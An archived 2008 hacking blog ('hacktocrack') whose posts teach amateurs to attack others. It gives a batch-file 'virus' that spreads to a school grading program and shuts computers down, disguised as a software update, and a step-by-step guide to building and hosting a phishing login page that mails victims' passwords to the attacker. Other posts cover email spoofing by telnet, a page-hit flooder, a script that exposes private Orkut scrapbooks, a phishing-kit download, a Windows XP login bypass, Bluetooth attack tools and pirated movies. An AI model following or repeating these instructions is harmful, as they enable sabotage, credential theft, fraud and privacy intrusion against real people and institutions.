Posted in Password Hacking, hacking, hacking websites with tags hack into page, hack websites, hacking,
how to hack websites, Password Hacking, website hacking on April 5, 2008 by hacktocrack

A Test to see if You are Really A Hacker Hack This Page -


http://hacktocrack.wordpress.com/hack-into-this-page/

Very Simple.

Leave A Comment On The Page To Let Me Know If You Have Hacked It

22 Comments »

Find IP info using Gmail/Yahoo/Hotmail


Posted in IP tools, Website hacks with tags Find IP, Find IP info, Find IP info using Gmail, Find IP info
using Gmail/Hotmail, Find IP info using Gmail/Yahoo, Find IP info using Gmail/Yahoo/Hotmail, Find IP
info using Hotmail, Find IP info using Yahoo, Find IP info using Yahoo/Hotmail on April 4, 2008 by
hacktocrack
When you recieve an email, you receive more than just the message. The email
comes with headers that carry important information that can tell where the email
was sent from and possibly who sent it. For that, you would need to find the IP
address of the sender. The tutorial below can help you find the IP address of the
sender. Note that this will not work if the sender uses anonymous proxy servers.

First of all, the IP address is generally found in the headers enclosed beween square
brackets, for instance, [129.130.1.1]
Finding IP address in Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the email headers,

• Click on the inverted triangle beside Reply. Select Show Orginal.

4. manually find the IP address, proceed to 5.


5. Look for Received: from followed by the IP address between square
brackets [ ].
Received: from [69.138.30.1] by web4587.mail.***.yahoo.com

6. If you find more than one Received: from patterns, select the last one.
7. Track the IP address of the sender

Finding IP address in Yahoo! Mail


1. Log into your Yahoo! mail with your username and password.

2. Click on Inbox or whichever folder you have stored your mail.

3. Open the mail.

4. If you do not see the headers above the mail message, your headers are not displayed.
To display the headers,

• Click on Options on the top-right corner


• In the Mail Options page, click on General Preferences
• Scroll down to Messages where you have the Headers option
• Make sure that Show all headers on incoming messages is
selected
• Click on the Save button
• Go back to the mails and open that mail

5. You should see similar headers like above

Or if you want to manually find the IP address, proceed to 6.

6. Look for Received: from followed by the IP address between square brackets [ ]. Here,
it is 202.65.138.109.

That is be the IP address of the sender.

If there are many instances of Received: from with the IP


address, select the IP address in the last pattern. If there are
no instances of Received: from with the IP address, select the
first IP address in X-Originating-IP.

7. Track the IP address of the sender

Finding IP address in Hotmail


1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.

3. Open the mail.

4. If you do not see the headers above the mail message, your headers are not displayed.
To display the headers,

• Click on Options on the top-right corner


• In the Mail Options page, click on Mail Display Settings
• In Message Headers, make sure Advanced option is checked
• Click on Ok button
• Go back to the mails and open that mail

5. You should see the email headers now.

6. manually find the IP address, proceed to 7.

7. If you find a header with X-Originating-IP: followed by an IP address, that is the


sender’s IP address

Hotmail headers

In this case the IP address of the sender is [68.34.60.59].

8. If you find a header with Received: from followed by a Gmail proxy like this

Hotmail headers
Look for Received: from followed by IP address within square brackets[
In this case, the IP address of the sender is [69.140.7.58].

9. Or else if you have headers like this

Hotmail headers

Look for Received: from followed by IP address within square


brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam
mail).

10. If you have multiple Received: from headers, eliminate the ones that have
proxy.anyknownserver.com.

11. Track the IP address of the sender


3 Comments »

Shut Down Your School!


Posted in XP Hacking, hacking with tags hack into school computers, hacking computers, hacking in
school, how to shut down your school, shut down your school! on April 4, 2008 by hacktocrack

By using the following command you can shutdown your school or college by using only
Note pad.

This is the main command that will be launched upon startup.


Type this in Notepad.
@echo off shutdown.exe -s -t 10 -c
“You have been hacked!”
Save this as shutdown.bat, making sure you choose all files as the filetype.

Step 2
Make it run on Startup The file you need can be downloaded here: This is just a simple
registry file that anyone can create, but I don’t feel like explaining the registry to
everyone. It will disguise itself by claiming to be an update for STI.
http://www.mutantsrus.com/Update.reg

Step 3
Set up the replication systemHere is the code to set up the replicator (the program that
allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and !
means that it varies. It depends on what program you are using. To find out how to fill
these blank, get on a computer that has access to the server that stores your grading
program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for
the grading program. ! is the name of the main exe.

Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti

Here is the code:

@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move


C:\!.exemove C:\shutdown.batmove C:\Update.regexit

Save this as global.bat

Step 4
They grow up so fast — real fast!This script will infect any teacher that uses STI with the
shutdown command. The little viral babies will copy themselves to the user’s hard drive
and remain there.

@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few
seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:
\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:
\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:
\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch
File Compiler. You can get QuickBFC here: QuickBFC and download this file as a
template for QuickBFC to work with. Just save the compiled file over this one.

Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the
same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat

Save as cure.bat

@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move


C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe

Step 6
The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all
the files to their proper places and places the replicator in the STI drive.I am going to use
WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all
the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe,
cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar
file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click
“Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the
field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file
anywhere you want and as any name. To install the virus, just run this program on a
computer at school that is connected to the server that has the grading program on it (such
as any computer in the Comp Lab.)

3 Comments »

Hide Your Files In a JPEG


Posted in Easy Hacking, hacking, offline hacking with tags free tips, hacking, hacking tips, hacking tricks,
hide files, hide files in jpeg, hide folders, hide your files in a jpeg, how to hide files, how to hide folders on
April 3, 2008 by hacktocrack

Well, did you know you could hide your files in a JPEG file? For this, you will only need
to download WinRAR. You just need to have a little knowledge about Command Prompt
and have WinRAR installed.

Ok, lets begin…


1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in
C:\hidden - RECOMMENDED).

2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the
same directory (C:\hidden).

3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in
C:\hidden.

4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working
directory C:\hidden.

5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg
is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the
file which contains both.

6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it
(double-click) and it will show the picture you wanted to show. Now try opening the
same file with WinRAR, it will show the hidden archive .

3 Comments »

Website Hacking
Posted in Hardcore Hacking, Internet Explorer, Javascript/html Hacking, Mozilla Firefox, Password
Hacking, Website hacks, cmd, hack websites, hacking websites with tags hack a website, hack google, hack
website, hacking, hacking tips, hacking tricks, how to hack a website on April 1, 2008 by hacktocrack
Note: This is for Average Hackerz, Not Newbies
This article was taken from http://www.ifinityexists.com
we are explaining the website attack known as Cross-Site Scripting (XSS). Cross-Site
Scripting is a type of security vulnerability that affects web applications that do not
sanitize user input properly. This kind of vulnerability allows an “attacker” to inject
HTML or client side script like JavaScript into the website. Cross-Site Scripting is most
commonly used to steal cookies. Cookies are used for authenticating, tracking, and
maintaining specific information about users; therefore, by stealing a user’s cookies an
attacker could bypass the website’s access control. There are three types of XSS attacks:
Persistent, Non-Persistent, and DOM-Based. In this episode we will cover Persistent and
Non-Persistent Cross-Site Scripting attacks.Live Stream Here
Download Here

Download Cookie Catcher Here

Get a md5 password hasher, to decrypt the hash

7 Comments »
Page hits flooder
Posted in hack websites with tags flood page hits, hack page hits, page hits flooder on March 27, 2008 by
hacktocrack

This small program can flood ur page hits.

but you have to dedicate one browser for it.. like internet explorer
method:
make a batch file with these lines

@echo off
:1
start C:\Progra~1\Intern~1\iexplore.exe “http://yoursite.com“
ping -n 10 127.0.0.1 >nul
taskkill.exe /im iexplore.exe
goto 1

depending upon your net speed u may increase the 10 secs time wait

with 10 sec time u may have 360 hits in an hour


with 5 sec time u may have 720 hits in an hour

6 Comments »

Hack - View Locked Scrapbooks


Posted in Easy Hacking, Orkut, Website hacks, hacking with tags free hacking tips, hack locked
scrapbooks, hacking, hacking tips, View Locked Scrapbooks on March 27, 2008 by hacktocrack

How To Use this Hack?

There are three ways to use this hack.You can choose the one that best suits you.

a> Login To Your Sandbox Profile and Directly View The Locked Scrapbook

or

b> Using this Javascript :

* Navigate to the profile which has disallowed non-friends to view his/her scrapbook
* Run this script in the address bar

*
javascript:document.location=’http://scraphack.cspbrasil.com/ViewScraps.php?uid=’+en
codeURIComponent(location.href);void(0)
* Wait for 4-5 seconds and you will get to see the scraps.

or

c> Userscript (Credits - D3 ) - The Recommended Method because you need not run any
script again and again. Kindly follow the instructions stated below:

* Install Grease Monkey in case you don’t have it - Search for it on google (another way
to resort to Firefox)
* Install View Locked Scrapbook Script
* In case you have any problems downloading or operating these scripts, you must read
this tutorial.

Leave A Comment »

Create your own f@ke login page!!!


Posted in Easy Hacking, Hotmail, Password Hacking, Website hacks, Yahoo, hacking with tags create
yahoo fake login page, create your own fake login page, fake login, fake login page, hack hotmail, hack
yahoo login page, phisher login on March 27, 2008 by hacktocrack

This is an easier version from the “How to Hack Gmail, Yahoo, Hotmail, Orkut or
Any Other”

This goes into more detail on how to create a fake page to login, and get redirected while
it is sending a email of the password and username to your inbox. If you found this easy,
then try out the post, “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other”

Fake login page is a fake page which you can use to hack others username and password.
Fake login page looks exactly like the original page and if someone login in your page
using his original username and password, the username and password will be mailed to
you
The process of Hacking anyone’s id using fake login pages is known as Phishing

Now let’s learn how to create your very own fake login page.

{1} Open www.jotform.com and Sign Up.


{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries,
select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the
First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit
it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form
properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This
Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or
anything. Actually after entering username & password, user will get redirect to this
url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of
‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on
the internet so that everyone can view it. Now i think that you would be knowing it and if
in case you do not know it please leave a comment with your email-id and i will mail you
how to do it.
Now you can view it by typing the url in the address bar.
NOTE: If u want to send it to the internet, then first you will have to create a hosting
account which you can create on www.110mb.com and there are many other sites which
you can find on the internet very easily.
I suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or
just “upload”. Then select the file which you want to send to the internet and click on
upload. And you are done.
Now you can access you file on the net by just typing the url ofthe file.
And you will receive password of the users that login to your site through email-id which
you’ve entered while creating the form.
see my fake login page
http://www.citkatboy.110mb.com/index.html

59 Comments »

Essential Bluetooth hacking tools


Posted in Uncategorized with tags bluesnarf, bluetooth hack, bluetooth sniffer, download bloover,
download bluebugger, download bluediving, download bluescan, download bluesnarfer, download
bluesniff, download bluetest, download btauding, download btbrowser, download btcrack, download
cihwb, download t-bear, hack, hack bluetooth, hacking, how to bluesnarf on March 26, 2008 by
hacktocrack
Bluetooth technology is great. No doubt. It provides an easy way for a wide range of
mobile devices to communicate with each other without the need for cables or wires.
However, despite its obvious benefits, it can also be a potential threat for the privacy and
security of Bluetooth users (remember Paris Hilton?).If you want the best Bluetooth
hacker java app, then refer to the “Super Bluetooth Hack” post
If you are planning to gain a deeper understanding of Bluetooth security, you will need a
good set of tools with which to work. By familiarizing yourself with the following tools,
you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled
devices, but you will also get a glimpse at how an attacker might exploit them.

This hack highlights the essential tools, mostly for the Linux platform, that can be used to
search out and hack Bluetooth-enabled devices.

Discovering Bluetooth Devices

BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to


extract as much information as possible for each newly discovered device. Download
BlueScan.

BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden


Bluetooth-enabled devices. Download BlueSniff.

BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the
technical specification of surrounding Bluetooth-enabled devices. You can browse device
information and all supported profiles and service records of each device. BTBrowser
works on phones that supports JSR-82 - the Java Bluetooth specification. Download
BTBrowser.

BTCrawler -BTCrawler is a scanner for Windows Mobile based devices. It scans for
other devices in range and performs service query. It implements the BlueJacking and
BlueSnarfing attacks. Download BTCrawler.

Hacking Bluetooth Devices

BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a


set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By
exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book,
calls lists and other private information. Download BlueBugger.

CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing


framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits
and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC
with the Microsoft Bluetooth stack. Download CIHWB.

Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks


like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth
address spoofing, an AT and a RFCOMM socket shell and implements tools like
carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM
scanner and greenplaque scanning mode. Download Bluediving.
Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for
Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing
tools and various cracking tools. Download T-BEAR.

Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable
to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-
enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the
phone without alerting the owner, and gain access to restricted portions of the stored data.
Download Bluesnarfer.

BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to
reconstruct the Passkey and the Link key from captured Pairing exchanges. Download
BTcrack.

Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an


auditing tool to check whether a mobile phone is vulnerable. Download Blooover II.

BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable


Bluetooth-enabled devices. Download BlueTest.

BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled


devices. Download BTAuding.

What’s next? Let everyone know to disable Bluetooth until they really need it.
Additionally, make sure to update your phone software on a regular basis.

6 Comments »

Small Hack For Orkut


Posted in Mozilla Firefox, Orkut with tags hack orkut, orkut hacks on March 26, 2008 by hacktocrack

Taken From http://bothack.wordpress.com/2006/06/15/hacking-orkut/

Orkut a very famous social networking site has an option called scrapbook. Now for
those people who scrap many times a minute, here is a hack:

If you are using firefox, Install this script (addon) and it will allow you to scrap back just
in one click rather than the traditional 2 step + 1 click scrapping. This not only saves
time, but also helps you keep things contextual.
Screenshot (click to enlarge):

Another reason to shift to firefox works with all versions of firefox.

9 Comments »

Top 15 Hacking Software


Posted in Download, Easy Hacking, Hardcore Hacking, IP tools, Javascript/html Hacking, hacking, offline
hacking with tags best hacking software, Easy Hacking, hacking software on March 18, 2008 by
hacktocrack

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (”Network Mapper”) is a free open source utility for network exploration or
security auditing. It was designed to rapidly scan large networks, although it works fine
against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are
available on the network, what services (application name and version) those hosts are
offering, what operating systems (and OS versions) they are running, what type of packet
filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types
of computers and both console and graphical versions are available. Nmap is free and
open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool,
once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server
framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000
organizations world-wide. Many of the world’s largest organizations are realizing
significant cost savings by using Nessus to audit business-critical enterprise devices and
applications.

Get Nessus Here

3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix
(11 are officially supported, not counting different architectures), DOS, Win32, BeOS,
and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several
crypt(3) password hash types most commonly found on various Unix flavors, supported
out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus
several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests
against web servers for multiple items, including over 3200 potentially dangerous
files/CGIs, versions on over 625 servers, and version specific problems on over 230
servers. Scan items and plugins are frequently updated and can be automatically updated
(if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on
http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly
popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you
check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system
on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active
connections to the target machine.

Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture
and interactively browse the contents of network frames. The goal of the project is to
create a commercial-quality analyzer for Unix and to give Wireshark features that are
missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct
TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different


Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the
deployed networks and systems. Currently, the following network protocols are
implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic
Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby
Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN
Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely
remove sensitive data from your hard drive by overwriting it several times with carefully
selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is
Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s
really gone, you don’t want it hanging around to bite you in the ass.
Get Eraser Here.

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along
with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH
from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in
Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute
force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy
recovery of various kind of passwords by sniffing the network, cracking encrypted
passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP
conversations, decoding scrambled passwords, revealing password boxes, uncovering
cached passwords and analyzing routing protocols. The program does not exploit any
software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection
system. Kismet will work with any wireless card which supports raw monitoring (rfmon)
mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts,
but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area
Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

• Verify that your network is set up the way you intended.


• Find locations with poor coverage in your WLAN.
• Detect other networks that may be causing interference on your network.
• Detect unauthorized “rogue” access points in your workplace.
• Help aim directional antennas for long-haul WLAN links.
• Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet
monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is


inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests.
It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to
send files between a covered channel, and many other features.

Get hping Here

Source:http://www.darknet.org.uk/2006/04/top-15-securityhacking-tools-utilities/

7 Comments »

Spoofing Via Telnet


Posted in Email, Telnet, cmd with tags fake email send, fake smtp, send fake email, spoofing telnet on
March 18, 2008 by hacktocrack

Get a smtp server ( i use mx1.hotmail.com)

they’re normally likemx1,mx2 etc..thehost.com.

Now, go to Start>Run>cmd then in the cmd window,

Type telnet mx1.hotmail.com 25

then HELO hotmail.com then MAIL FROM : (fake email here)


then RCPT TO: (person)then DATA then type your message,

you can press enter for a new line, finish the message by a full stop (.) on a new line,
press enter!

spoofed.

For Educational purpose only

Didn’t it work? Go www.deadfake.com

1 Comment »

Auto Ph$her / Fake Web Login Creator


Posted in Uncategorized on March 13, 2008 by hacktocrack

Auto Ph!$her / fake Web Login Creator — By DaveDaDon

All u need to do is write in the source of the page u wanna ph!$h


and it will make the phisher for u automatically, and it even saves it as well.

Download
http://rapidshare.com/files/90895580/Fishing_Bait_2.5.rar

Password: PremSoni

5 Comments »

Get IP address anonymity everytime


Posted in IP tools, Other with tags hide proxy, hide your ip, ip hider, proxy hider on March 13, 2008 by
hacktocrack

i have found one software which hide your IP address every time and give you a new IP
address by creating a Tor Network…….

If u have Mozilla then it works very fine

First Download Vidalia Bundle from here

http://www.torproject.org/download.html.en

Here is link for Windows and MAC OS ……….So download it according to your
requirement .
After that to easily turn on and turn off “TOR” .. You can install Firefox add on from here
:

https://addons.mozilla.org/en-US/firefox/addon/2275

then restart firefox….After that you will see at right bottom corner that your tor addon for
mozilla is installed…now when u want to hide your IP or want to surfing anonymously
Turn on or turn off by clicking on this.

You can check your ip address here

http://www.whatismyip.com/

3 Comments »

A Cool Forum To Join


Posted in Uncategorized with tags cool forum, free movies, full games, full music albums on March 11,
2008 by hacktocrack

Join www.causewearecool.co.nr To get the latest Downloads Of Full Movies, Games,


Music, Etc

Check it out

Leave A Comment »

Fastest Way To Hack into Someones System


Posted in Download, Easy Hacking, Hardcore Hacking with tags hack, fastest hack, easiest hack, free
portscanner on March 4, 2008 by hacktocrack
Well as I already mentioned you can hack any system as it is
conected to what we call “INTERNET”. To connect internet a
system allocates a port for communication and Data Transfer.
So we got to do is to get into that port that is to be hacked.

Steps: -

1. Software PORT SCANNER from google.


2. The IP address of the victim whose port is open.
3. NETLAB which gives u all information includes victim IP address,Area from
where he is accessing internet….
4. The IP of victim u found initially into NETLAB .
5. Thats it now you can access his system.
Note : This is really Hardcore Hacking and you should be very much careful while doing
all this and you do all this on your own responsibility. This site is never responsible for
anything you after reading any article from this site and there are almost 50-50 chances
that you may get caught so don’t try this unless you are aware of everthing. Yes you can
freak some of your friends by telling them that you can hack their systems very easily.

8 Comments »

A Cool Game To Play


Posted in Other with tags game, maze on March 2, 2008 by hacktocrack

Here’s A Cool Game To play If You Are Bored, Beat Me I Reached Level 5. Turn Up
The volume Very High, It’s Soft

1 Comment »

Hack This Website Test


Posted in hack websites with tags hack, hack test, hack this website on March 2, 2008 by hacktocrack

If you really think you are a hacker, then

Go to www.hack-test.com

Reply with what level you are on


11 Comments »

Download Jumper (2008)


Posted in Cracks/Wares, Download, Movies, Other with tags download full movie, download jumper
movie, free jumper movie on February 29, 2008 by hacktocrack
Jumper.TS.XViD-PreVail

Title: Jumper.2008
Theater Date: February.17.2008
Release Date: February.14.2008
CD/INFO: Cd1-50 x 15mbs
Framerate: 25fps PAL
Audio: Direct Line
Type: XVID
IMDB Rating: 6.4/10 (1,541 votes)
URL: http://www.imdb.com/title/tt0489099/
Genre: Adventure / Drama / Sci-Fi / Thriller

In These Troubled Times, We shall PreVail!!!


Tagline: Anywhere is possible.

Plot Outline: A genetic anomaly allows a young man to


teleport himself anywhere.
He discovers this gift has existed for
centuries and finds himself in
has been raging for thousands of years between

Hack Windows XP Password


Posted in Hardcore Hacking, Password Hacking, XP Hacking, offline hacking with tags DreamPackPL,
hack passwords, hack xp password, hacking, how to hack on February 29, 2008 by hacktocrack

Hi, Here’s Another Alternate to The Other Post - “Hack Windows XP Password”

Another method to login to a password protected Windows even if you do not have the
password is by making Windows accepting any passwords.
There is a far better way to get into

Windows XP. It is easy and it does not reset the password. Hack into a computer running
Windows XP without changing the password and find out all and any passwords on the
machine (including admin accounts). You do not need access to any accounts to do this.
Of course, do not do this on anyone elses computer without proper authorisation.
Steps to Hack into a
Windows XP Computer without changing password:

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL HERE.
3. Unzip the downloaded dpl.zip and you’ll get dpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000
Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1″ if
you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
“ren C:WindowsSystem32sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
“copy D:i386pinball.ex_ C:WindowsSystem32sfcfiles.dll” (without quotes and
assuming your CD drive is D
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will
appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.

15. Type “god” in the password field to get in Windows.You can also go to Passwords
and select “Logon with wrong password and hash”. This option allows you to login with
ANY password.

Note: I was unable to bring up the DreamPackPL for the first time because I have
Kaspersky Anti-Virus already running in background. I believe most antivirus already
labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you
bypass the Windows Login screen and it is not destructive.

6 Comments »
FAKE - Hack Password for Yahoo, Google, Gmail, AOL
and MSN
Posted in Email, Gmail with tags hacking, hack hotmail, msn freezer, hack msn hotmail, hack msn, how to
hack websites, hacking websites, hack website on February 29, 2008 by hacktocrack

DON’T TRY THIS, THIS IS AN EXAMPLE OF WHAT NOT TO DO

Go to the “How to hack Hotmail, Gmail, Yahoo, Orkut Or Any Other Post” Instead

*********************************************************************

If you are going to execute this, you are fooled. The above steps are false infos. They do
not provide you the password. Instead they will actually hack your password: Never be
fooled. Never send your password decrypted to any emails.

18 Comments »

Hack Password for Yahoo, Google, Gmail, AOL


and MSN
Posted in Uncategorized on February 29, 2008 by hacktocrack

AN EXAMPLE OF WHAT NOT TO DO………………………..

STEP 1- Log in to your own yahoo account. Note: Your account must be at
least 30 days old for this to work.

STEP 2- Once you have logged into your own account, compose/write an e-mail
to: THIS_IS_FAKE@yahoo.com This is a mailing
address to the Retrivepassword. The automated server will send you the password that
you have ‘forgotten’, after receiving the information you send
them.

STEP 3- In the subject line type exactly: ” PASSWORD RECOVERY “

STEP 4- On the first line of your mail write the email address of the person
you are hacking. STEP 5- On the second line type in the e-mail address
you are using.

STEP 6- On the third line type in the password to YOUR


email address (your OWN password). The computer needs your password so it
can send a JavaScript from your account in the Yahoo Server to extract the
other email addresses password. In other word the system automatically
checks your password to confirm the integrity of your status. The process will be done
automatically by the user administration server.

STEP 7- The final step before sending the mail is, type on the fourth line the following
code exactly:
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}

so for example if your yahoo id is : David_100@yahoo.com and your password


is: David and the email address you want to hack is: test@yahoo.com then
compose the mail as below:

To: pass_retrive_cgi@yahoo.com
bcc: cc: (Don’t write anything in cc,bcc field)

Subject: ” PASSWORD RECOVERY “

test@yahoo.com
David_100@yahoo.com
David
cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}

The password will be sent to your inbox in a mail called “System Reg Message” from
“System.

For Gmail:
To: key.admin.cgi@gmail.com
Sub: Password Request : Test@gmail.com

Rest as in yahoo

AOL and MSN will be alive soon:

If you are going to execute this, you are fooled. The above steps are false infos. They do
not provide you the password. Instead they will actually hack your password: Never be
fooled. Never send your password decrypted to any emails.

7 Comments »
How to Hack Gmail, Yahoo, Hotmail, Orkut or
Any Other
Posted in Email, Gmail, Hotmail, Password Hacking, Website hacks, Yahoo, hacking with tags hack, hack
